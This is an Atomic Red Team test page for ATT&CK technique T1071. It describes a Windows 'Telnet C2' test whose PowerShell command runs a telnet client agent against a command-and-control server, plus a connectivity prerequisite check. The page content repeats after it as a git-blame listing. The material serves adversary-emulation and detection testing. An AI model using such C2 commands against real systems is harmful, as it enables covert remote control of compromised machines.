atomics/T1071/T1071.md

# T1071 - Application Layer Protocol
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1071)
<blockquote>

Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 

Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, DNS, or publishing/subscribing. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22) 

</blockquote>

## Atomic Tests

- [Atomic Test #1 - Telnet C2](#atomic-test-1---telnet-c2)


<br/>

## Atomic Test #1 - Telnet C2
An adversary may establish Telnet communication from a compromised endpoint to a command and control (C2) server in order to carry out additional attacks on objectives.

**Supported Platforms:** Windows


**auto_generated_guid:** 3b0df731-030c-4768-b492-2a3216d90e53


#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| server_ip | C2 server IP or URL | url | 127.0.0.1|
| client_path | Client agent path | path | PathToAtomicsFolder&#92;T1071&#92;bin&#92;telnet_client.exe|
| server_port | C2 server port | integer | 23|


#### Attack Commands: Run with `powershell`! 


```powershell
#{client_path} #{server_ip} --port #{server_port}
```


#### Dependencies:  Run with `powershell`!
##### Description: A command and control (C2) server can be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on a specified server with a specified IP that must be reachable by a client (telnet_client.exe)
##### Check Prereq Commands:
```powershell
$connection = Test-NetConnection -ComputerName #{server_ip} -Port #{server_port}
if ($connection.TcpTestSucceeded) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Write-Host "Setup C2 server manually"
```


<br/>
Creating new test for T1059 and T1071 (#2708 ) 2024-02-29 08:27:14 +07:00			`# T1071 - Application Layer Protocol`
Generated docs from job=generate-docs branch=master [ci skip] 2024-02-29 01:28:02 +00:00			`## [Description from ATT&CK](https://attack.mitre.org/techniques/T1071)`
Generated docs from job=generate-docs branch=master [ci skip] 2025-02-13 22:03:40 +00:00			`<blockquote>`
Generated docs from job=generate-docs branch=master [ci skip] 2024-02-29 01:28:02 +00:00
Generated docs from job=generate-docs branch=master [ci skip] 2025-02-13 22:03:40 +00:00			`Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.`

			`Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, DNS, or publishing/subscribing. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22)`

			`</blockquote>`
Creating new test for T1059 and T1071 (#2708 ) 2024-02-29 08:27:14 +07:00
			`## Atomic Tests`

Generated docs from job=generate-docs branch=master [ci skip] 2024-02-29 01:28:02 +00:00			`- [Atomic Test #1 - Telnet C2](#atomic-test-1---telnet-c2)`
Creating new test for T1059 and T1071 (#2708 ) 2024-02-29 08:27:14 +07:00

			`<br/>`

			`## Atomic Test #1 - Telnet C2`
Generated docs from job=generate-docs branch=master [ci skip] 2024-08-24 19:07:19 +00:00			`An adversary may establish Telnet communication from a compromised endpoint to a command and control (C2) server in order to carry out additional attacks on objectives.`
Creating new test for T1059 and T1071 (#2708 ) 2024-02-29 08:27:14 +07:00
			`Supported Platforms: Windows`


			`auto_generated_guid: 3b0df731-030c-4768-b492-2a3216d90e53`




Generated docs from job=generate-docs branch=master [ci skip] 2024-02-29 01:28:02 +00:00
Creating new test for T1059 and T1071 (#2708 ) 2024-02-29 08:27:14 +07:00			`#### Inputs:`
			`\| Name \| Description \| Type \| Default Value \|`
			`\|------\|-------------\|------\|---------------\|`
Generated docs from job=generate-docs branch=master [ci skip] 2024-02-29 01:28:02 +00:00			`\| server_ip \| C2 server IP or URL \| url \| 127.0.0.1\|`
Generated docs from job=generate-docs branch=master [ci skip] 2024-04-07 02:49:34 +00:00			`\| client_path \| Client agent path \| path \| PathToAtomicsFolder\T1071\bin\telnet_client.exe\|`
Generated docs from job=generate-docs branch=master [ci skip] 2024-04-06 02:13:59 +00:00			`\| server_port \| C2 server port \| integer \| 23\|`
Creating new test for T1059 and T1071 (#2708 ) 2024-02-29 08:27:14 +07:00

			#### Attack Commands: Run with `powershell`!


Generated docs from job=generate-docs branch=master [ci skip] 2024-02-29 01:28:02 +00:00			```powershell
			`#{client_path} #{server_ip} --port #{server_port}`
Creating new test for T1059 and T1071 (#2708 ) 2024-02-29 08:27:14 +07:00			```




Generated docs from job=generate-docs branch=master [ci skip] 2024-02-29 01:28:02 +00:00			#### Dependencies: Run with `powershell`!
Generated docs from job=generate-docs branch=master [ci skip] 2024-08-24 19:07:19 +00:00			`##### Description: A command and control (C2) server can be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on a specified server with a specified IP that must be reachable by a client (telnet_client.exe)`
Creating new test for T1059 and T1071 (#2708 ) 2024-02-29 08:27:14 +07:00			`##### Check Prereq Commands:`
			```powershell
			`$connection = Test-NetConnection -ComputerName #{server_ip} -Port #{server_port}`
			`if ($connection.TcpTestSucceeded) {exit 0} else {exit 1}`
			```
Generated docs from job=generate-docs branch=master [ci skip] 2024-02-29 01:28:02 +00:00			`##### Get Prereq Commands:`
			```powershell
			`Write-Host "Setup C2 server manually"`
			```


Creating new test for T1059 and T1071 (#2708 ) 2024-02-29 08:27:14 +07:00

			`<br/>`